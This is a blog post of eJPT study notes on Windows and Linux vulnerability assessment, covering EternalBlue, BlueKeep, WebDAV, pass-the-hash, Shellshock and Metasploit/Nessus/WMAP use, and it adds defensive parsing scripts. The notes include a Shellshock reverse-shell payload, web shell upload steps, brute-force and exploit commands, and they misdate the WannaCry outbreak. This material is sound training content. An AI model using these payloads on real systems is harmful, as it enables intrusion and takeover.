eJPT - 1.4 Vulnerability Assessment

Windows Vulnerabilities
Windows has been the dominant OS worldwide for a while.
Its vulnerabilities range from MS08-067 to MS17-010.
It has various OS versions and releases, which makes the threat surface fragmented.
The versions share common weaknesses given their development history and philosophy:
Developed in C++, making them vulnerable to buffer overflows, arbitrary code execution, etc.
Not configured to run securely by default
Newly discovered vulnerabilities are not immediately patched by Microsoft
Vulnerable to cross-platform vulnerabilities (like SQL injection attacks)
Also vulnerable to physical attacks
As for the types of Windows vulnerabilities, some of the categories are:
| Category | Description |
| --- | --- |
| Information disclosure | Vulnerability that allows an attacker to access confidential data |
| Buffer overflows | Caused by a programming error that allows an attacker to write past the end of a buffer and overwrite adjacent allocated memory |
| Remote code execution | Vulnerability that allows an attacker to remotely execute code on a target |
| Privilege escalation | Vulnerability that allows an attacker to elevate their privileges after initial compromise |
| DoS attack | Vulnerability that allows an attacker to consume a system's resources, consequently preventing the system from functioning normally |
Frequently Exploited Services
Windows has various native services and protocols. These services provide an attacker with an access vector that they can utilize to gain access to a target host.
| Service | Ports | Purpose |
| --- | --- | --- |
| IIS | 80, 443 | Proprietary web server software |
| WebDAV | 80, 443 | HTTP extension that allows clients to update, delete, move and copy files on a web server. It's used to enable a web server to act as a file server |
| SMB | 445 | Network file sharing protocol that is used to facilitate the sharing of files and peripherals between computers on a LAN |
| RDP | 3389 | Proprietary GUI remote access protocol to remotely authenticate and interact with a Windows system |
| WinRM | 5986, 443 | Remote management protocol that can be used to facilitate remote access with Windows systems |
Scanning With Metasploit
Vulnerability scanning is the process of scanning a system for vulnerabilities and verifying whether they can be exploited. We will mainly be using auxiliary and exploit Metasploit modules to scan for and identify inherent vulnerabilities in services, the OS, and web applications.
You can search for exploits within Metasploit using:
search type:exploit name:(your search)
To search for Metasploit framework exploit modules from within a Kali terminal:
searchsploit "your search" | grep -e "Metasploit"
One very useful tool is metasploit-autopwn. It's available on GitHub here.
To download the tool:
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
To move it into the Metasploit framework:
cd metasploit-autopwn
mv db_autopwn.rb /usr/share/metasploit-framework/plugins
To load it within metasploit:
load db_autopwn
db_autopwn -p -t -PI
We can also use the analyze command within the Metasploit framework to analyse an IP for vulnerabilities it has detected and for which exploit modules are available.
WebDAV Vulnerabilities
Microsoft IIS (Internet Information Services) is web server software developed by Microsoft. It can be used to host websites or web apps and provides admins with a GUI to manage websites. It can host both static and dynamic web pages developed in ASP.NET and PHP. It normally runs on ports 80 and 443.
The supported executable file extensions for IIS are:
.asp
.aspx
.config
.php
WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the HTTP protocol which allows users to collaboratively edit and manage files on remote web servers. It runs on top of Microsoft IIS on ports 80 and 443.
In order to connect to a WebDAV server, you have to provide credentials because it implements authentication (username and password). To exploit:
Identify whether WebDAV is running on IIS or Apache
Perform a brute-force attack to identify legitimate credentials to use for authentication
Authenticate with WebDAV
Upload a malicious .asp payload that can be used to execute arbitrary commands or obtain a reverse shell on the target
One of the tools we can use to exploit WebDAV is Davtest. Davtest is a scanner that creates a directory on the WebDAV server, uploads test files with many different extensions into it, and tries to execute each one. It then lists the extensions that executed, which tells us which type of web shell file to use against the WebDAV server.
davtest -auth username:password -url http://targetip/webdav
Another tool is cadaver. It's used for uploading, editing and moving files on a WebDAV server. We will use it to upload a web shell to the target IP address.
cadaver http://targetip/webdav
put /usr/share/webshells/asp/webshell.asp
(In other cases, where php is accepted, we can use that webshell instead of asp)
To brute-force credentials using hydra:
hydra -L /usr/share/wordlists/metasploit/common_users.txt -P /usr/share/wordlists/metasploit/common_passwords.txt (target ip) http-get /webdav/
CVE-2017-0144 EternalBlue
The Windows SMB vulnerability EternalBlue (MS17-010 / CVE-2017-0144) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a Windows system and consequently the network that the target system is a part of.
It was developed by the NSA and then leaked to the public by a hacker group called the Shadow Brokers in 2017. It takes advantage of a vulnerability in the SMBv1 protocol that allows attackers to send specially crafted packets, giving them a Meterpreter session or a reverse shell.
It was used in the WannaCry ransomware attack on June 27, 2017 to exploit other Windows systems across networks with the objective of spreading the ransomware to as many systems as possible.
It affects multiple versions of Windows:
Windows Vista
Windows 7
Windows Server 2008
Windows 8.1
Windows Server 2012
Windows 10 (only a certain build)
Windows Server 2016
Microsoft released a patch for the vulnerability in 2017, but many systems and companies have still not patched. Metasploit has an auxiliary module that can be used to check whether a target system is vulnerable to the exploit. It also has an exploit module that can be used to exploit the vulnerability on unpatched systems.
The auxiliary module - smb_ms17_010
The exploit module - ms17_010_eternalblue
You can also manually exploit the vulnerability by utilizing publicly available exploits. One such exploit is AutoBlue-MS17-010, which can be found here.
cd shellcode
chmod +x shell_prep.sh
./shell_prep.sh
chmod +x eternalblue_exploit7.py
python eternalblue_exploit7.py (target ip) shellcode/sc_x64.bin
You can check if a system is vulnerable to this attack via Nmap:
nmap -sV -p445 --script=smb-vuln-ms17-010 (target ip)
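The Nmap check above prints one result per host. Across a whole subnet it is easier to save the scan with -oX and parse the XML than to read the screen. The script below is an added example for these notes, not code from the original post or from the Nmap project: it maps each host to the state the smb-vuln-ms17-010 script reported, so the output doubles as a patch list. When run without a file argument it parses a constructed sample in the same shape as Nmap's XML; the addresses in that sample are made up.

```python
"""Triage nmap smb-vuln-ms17-010 results across many hosts (added example)."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample mimicking `nmap -sV -p445 --script=smb-vuln-ms17-010 -oX scan.xml ...`.
# Host 1: script reports VULNERABLE. Host 2: explicit NOT VULNERABLE (Nmap only
# prints that when vulns.showall is set). Host 3: no <script> element at all,
# which is what you get when the host is patched or the check could not run.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p445 --script=smb-vuln-ms17-010 -oX scan.xml 192.0.2.0/29">
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
<service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port></ports>
<hostscript><script id="smb-vuln-ms17-010" output="&#xa;  VULNERABLE:&#xa;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#xa;    State: VULNERABLE&#xa;    IDs:  CVE:CVE-2017-0144">
<table key="CVE-2017-0144"><elem key="state">VULNERABLE</elem></table></script></hostscript>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.11" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/></port></ports>
<hostscript><script id="smb-vuln-ms17-010" output="&#xa;  NOT VULNERABLE:&#xa;    State: NOT VULNERABLE">
<table key="CVE-2017-0144"><elem key="state">NOT VULNERABLE</elem></table></script></hostscript>
</host>
<host><status state="up" reason="arp-response"/>
<address addr="192.0.2.12" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/></port></ports>
</host>
</nmaprun>
"""


def ms17_010_status(xml_text):
    """Map each scanned host address to the state reported by smb-vuln-ms17-010.

    Returns {addr: 'VULNERABLE' | 'NOT VULNERABLE' | 'not reported'}.
    """
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']") or host.find("address")
        if addr_el is None:
            continue
        state = "not reported"
        # smb-vuln-ms17-010 is a host-level script, so its result sits under <hostscript>.
        for script in host.iter("script"):
            if script.get("id") != "smb-vuln-ms17-010":
                continue
            elem = script.find(".//elem[@key='state']")
            if elem is not None and elem.text:
                state = elem.text.strip()
            else:
                # Fall back to the human-readable output attribute.
                state = "VULNERABLE" if "State: VULNERABLE" in (script.get("output") or "") else "NOT VULNERABLE"
        result[addr_el.get("addr")] = state
    return result


def vulnerable_hosts(xml_text):
    """Only the addresses that still need the MS17-010 patch (or SMBv1 disabled)."""
    return sorted(a for a, s in ms17_010_status(xml_text).items() if s == "VULNERABLE")


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for addr, state in ms17_010_status(text).items():
        print(f"{addr:15} {state}")
```

Hosts that come back as "not reported" are worth a second look rather than being treated as safe: the script stays silent both when the host is patched and when it could not complete the SMB check.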
Tip to set up a netcat listener:
nc -nvlp (the port you are listening on)
CVE-2019-0708 BlueKeep
The Windows RDP vulnerability BlueKeep (CVE-2019-0708) is the name given to a vulnerability that can potentially allow attackers to remotely execute arbitrary code and gain access to a Windows system. It was made public by Microsoft in May 2019 alongside a patch for companies to apply. When discovered, about 1 million systems were vulnerable.
This exploit takes advantage of a vulnerability in the Windows RDP protocol that allows attackers to gain access to the kernel memory and execute code remotely at the system level without needing authentication.
It affects multiple versions of Windows:
XP
Vista
Windows 7
Windows Server 2008 & R2
Many illegitimate proofs of concept and exploit code exist for it, some of which could be malicious in nature, so it is recommended to only use verified exploit code and modules for exploitation. Metasploit has an auxiliary module and an exploit module that can be used against unpatched systems.
The auxiliary module - cve_2019_0708_bluekeep
The exploit module - cve_2019_0708_bluekeep_rce
Note that exploits targeting kernel-space memory and applications can and will cause crashes. To avoid this, be very careful and keep the memory region you are exploiting as small as possible.
Pass-the-Hash Attacks
It is an exploitation technique that involves capturing or harvesting NTLM hashes or clear-text passwords and utilizing them to authenticate with the target legitimately. This will allow us to gain access as opposed to obtaining access via service exploitation.
We can use the Metasploit PsExec module or the CrackMapExec tool to do this. You need the LM hash as well as the NTLM hash to do this.
The exploit module within Metasploit is:
exploit/windows/smb/psexec
set SMBUser (username)
set SMBPass (LM_hash:NTLM_hash)
You will have to set a target to get a meterpreter session.
crackmapexec smb (target ip) -u (username) -H "NTLM Hash" -X "any command you'd like to run"
Linux Vulnerabilities
Linux is a free and open-source OS composed of the Linux kernel and the GNU toolkit. Linux has various use cases, but it's typically deployed as a server operating system.
For this reason, there are specific services and protocols that will typically be found running on a Linux server. These services provide an attacker with an access vector that they can utilize to gain access to a target host.
Frequently Exploited Services
| Service | Ports | Purpose |
| --- | --- | --- |
| Apache | 80, 443 | Free, open-source cross-platform web server. Accounts for over 80% of web servers globally. |
| SSH | 22 | Secure way to remotely access and control a system over an unsecured network. Successor to Telnet. |
| FTP | 21 | Used to facilitate file sharing |
| SAMBA | 445 | Linux implementation of SMB |
CVE-2014-6271 Shellshock
The Linux Bash vulnerability Shellshock (CVE-2014-6271) is the name given to a vulnerability found in the Bash shell (since V1.3) that allows an attacker to execute arbitrary commands remotely via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell. It was discovered by Stephane Chazelas on 12/09/2014 and was made public on 24/09/2014.
Bash is a Unix shell that is part of the GNU project and is the default shell for most Linux distributions. The vulnerability is caused by the way Bash processes function definitions passed in through environment variables: it executes any trailing commands that follow the characters () { :; };.
This only affects Linux, as Windows is not Unix-based.
In the context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack. CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system, after which the output is displayed to the client.
In order to exploit it, you will need to locate an input vector or script that allows you to communicate with Bash. In the context of an Apache web server, we can utilize any legitimate CGI script accessible on the web server. Whenever a CGI script is executed, the web server starts a new process and runs the CGI script with Bash, passing the request headers to it as environment variables.
Because of this, whenever we make a new HTTP request for a CGI script, the server runs it with Bash, so we can place those characters in the User-Agent HTTP header followed by any other commands. It can be exploited manually or automatically with an exploit module.
We can check if an Apache web server is vulnerable to this attack using Nmap. Replace the /gettime.cgi with the path of the CGI script on the web server you are performing this on.
nmap -sV (target ip) --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
To exploit this manually, enable FoxyProxy in Firefox to send traffic to Burp Suite. Then go to the Proxy tab and ensure that intercept is on. Now reload the page with the CGI script and send the request to the Repeater. Delete the User-Agent value and replace it with the following. You can replace the reverse shell with any command.
() { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/your_ip/listen_port 0>&1'
To exploit this with the Metasploit framework, there is an auxiliary and an exploit module. To run the exploit, set the RHOSTS value to the target IP address and the TARGETURI value to the path where the CGI file is served (in this case, /gettime.cgi). Also set the LHOST option to your IP address. Once this is done, you will have a Meterpreter session.
The auxiliary module - apache_mod_cgi_bash_env
The exploit module - apache_mod_cgi_bash_env_exec
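The User-Agent trick works because Apache copies request headers into the CGI process environment, so the same characters are exactly what to look for when reviewing web logs for Shellshock probes. The following is an added example for these notes, not code from the original post or from the Apache project: it parses Apache combined-format access log lines and flags any request whose User-Agent or Referer carries the Bash function-definition prefix. The log lines are constructed samples with made-up addresses, and the probe strings in them only run /bin/echo.

```python
"""Flag Shellshock probes in Apache access logs (added example)."""
import re

# Apache combined log format: host ident user [time] "request" status bytes "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)

# The Bash function-definition prefix "() {" with optional whitespace, the same
# shape that IDS signatures for CVE-2014-6271 match on.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Constructed sample log: one benign CGI request, two probes in User-Agent
# (one against a CGI path, one with no spaces at all) and one probe in Referer.
SAMPLE_LOG = """\
198.51.100.20 - - [24/Sep/2014:10:15:32 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"
198.51.100.77 - - [24/Sep/2014:10:16:01 +0000] "GET /cgi-bin/gettime.cgi HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/echo probe"
198.51.100.77 - - [24/Sep/2014:10:16:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :;}; /bin/echo probe" "curl/7.38.0"
198.51.100.80 - - [24/Sep/2014:10:17:45 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 500 0 "-" "(){:;};/bin/echo probe"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one finding per log line whose User-Agent or Referer carries the prefix.

    Each finding records the line number, source IP, the header that carried the
    payload, the requested path, and whether that path looks like a CGI target
    (a hit against /cgi-bin/ or a .cgi/.sh script is the one that matters).
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                parts = rec["request"].split(" ")
                path = parts[1] if len(parts) > 1 else rec["request"]
                findings.append({
                    "line": lineno,
                    "ip": rec["ip"],
                    "field": field,
                    "path": path,
                    "cgi": "/cgi-bin/" in path or path.endswith((".cgi", ".sh")),
                })
                break
    return findings


if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} via {f['field']} -> {f['path']} (cgi={f['cgi']})")
```

Any hit against a CGI path on a server whose Bash predates the fix deserves an incident ticket, not just a log note; the benign-looking echo in the sample is what a scanner sends first to confirm the bug before sending anything worse.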
Vulnerability Scanning
Nessus
It's a proprietary vulnerability scanner developed by Tenable. We can perform a scan on a target system which we can then import into Metasploit for analysis and exploitation. It automates the process of identifying vulnerabilities and provides us with information pertinent to a vulnerability like the CVE code.
There are paid and free versions of Nessus. The free version allows us to scan up to 16 IP addresses. We can access the link here, and you can register for free to get the activation code.
Once you've completed a scan with Nessus, you can export the results as a .nessus file. We can then import this into the Metasploit framework using db_import. We can then go through these results and look for CVE codes. Then we can search for exploit modules using those CVE codes:
search cve:(enter the year) name:(the service)
Alternatively, within the Nessus framework on the web, we can use the filter to filter out the results where Metasploit exploit modules are available. We can click on it and find the specific module name to run and gain a meterpreter session on the target.
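A .nessus export is plain XML, so the "look for CVE codes" step can be scripted instead of done by eye. The following is an added example for these notes, not code from the original post or from Tenable: it walks each ReportHost and ReportItem, keeps the findings that carry a CVE, and records whether Nessus already knows of public exploit code or a Metasploit module for them. The export below is a constructed sample; the host address, plugin IDs and plugin names are made up to show the shape only, and the CVE identifiers are the two discussed in these notes.

```python
"""Extract CVEs and exploit availability from a .nessus export (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample export. Real files carry many more child tags per item;
# only the ones this script reads are included.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
<Report name="lab scan">
<ReportHost name="192.0.2.10">
<HostProperties><tag name="host-ip">192.0.2.10</tag><tag name="operating-system">Windows 7</tag></HostProperties>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4" pluginID="0" pluginName="(constructed) SMBv1 remote code execution" pluginFamily="Windows">
<cve>CVE-2017-0144</cve>
<exploit_available>true</exploit_available>
<exploit_framework_metasploit>true</exploit_framework_metasploit>
<metasploit_name>(constructed) smb eternalblue module</metasploit_name>
</ReportItem>
<ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="4" pluginID="0" pluginName="(constructed) RDP remote code execution" pluginFamily="Windows">
<cve>CVE-2019-0708</cve>
<exploit_available>true</exploit_available>
</ReportItem>
<ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0" pluginID="0" pluginName="(constructed) SMB service detection" pluginFamily="Service detection">
</ReportItem>
</ReportHost>
</Report>
</NessusClientData_v2>
"""


def triage(nessus_xml, min_severity=1):
    """One record per (host, finding) that names at least one CVE.

    Nessus severity runs 0 (info) to 4 (critical); info-only items are skipped by
    default. Records come back sorted most severe first, then by host and port.
    """
    root = ET.fromstring(nessus_xml)
    records = []
    for host in root.iter("ReportHost"):
        addr = host.get("name")
        for item in host.iter("ReportItem"):
            cves = [c.text.strip() for c in item.findall("cve") if c.text]
            severity = int(item.get("severity", "0"))
            if not cves or severity < min_severity:
                continue
            msf = item.findtext("metasploit_name")
            records.append({
                "host": addr,
                "port": int(item.get("port")),
                "service": item.get("svc_name"),
                "severity": severity,
                "plugin": item.get("pluginName"),
                "cves": cves,
                "exploit_available": item.findtext("exploit_available") == "true",
                "metasploit_name": msf.strip() if msf else None,
            })
    records.sort(key=lambda r: (-r["severity"], r["host"], r["port"]))
    return records


def patch_list(records):
    """Hosts with at least one critical finding that has public exploit code: patch these first."""
    return sorted({r["host"] for r in records if r["severity"] >= 4 and r["exploit_available"]})


if __name__ == "__main__":
    recs = triage(SAMPLE_NESSUS)
    for r in recs:
        print(f"{r['host']}:{r['port']} sev={r['severity']} {', '.join(r['cves'])}"
              f" exploit={r['exploit_available']} msf={r['metasploit_name']}")
    print("patch first:", patch_list(recs))
```

The CVE year and service name from each record are what go into the search command from the notes; where metasploit_name is present, Nessus has already matched the module for you, which is the same information the "Metasploit exploit available" filter shows in the web UI.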
WMAP
WMAP is a tool used for web application vulnerability scanning. It can be used to automate web server enumeration. It's available as an MSF plugin and can be loaded directly into MSF, and it integrates with the Metasploit Framework database.
To load WMAP within Metasploit:
workspace -a Web_Scan
load wmap
To add a site to scan:
wmap_sites -a (target ip)
To set up our target:
wmap_targets -t http://(target_ip)/
To search for useful auxiliary modules for our target:
wmap_run -t
To then run those auxiliary modules:
wmap_run -e
To list out the vulnerabilities that wmap has found:
wmap_vulns -l
We can use the module http_put to test whether or not we can upload a file to a directory. If we can, then it can be exploited by uploading a malicious file.
That’s it for this section. Next one up is the CTF or skill check that iNE has put up.
— Hmad
Written by Hmad
I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.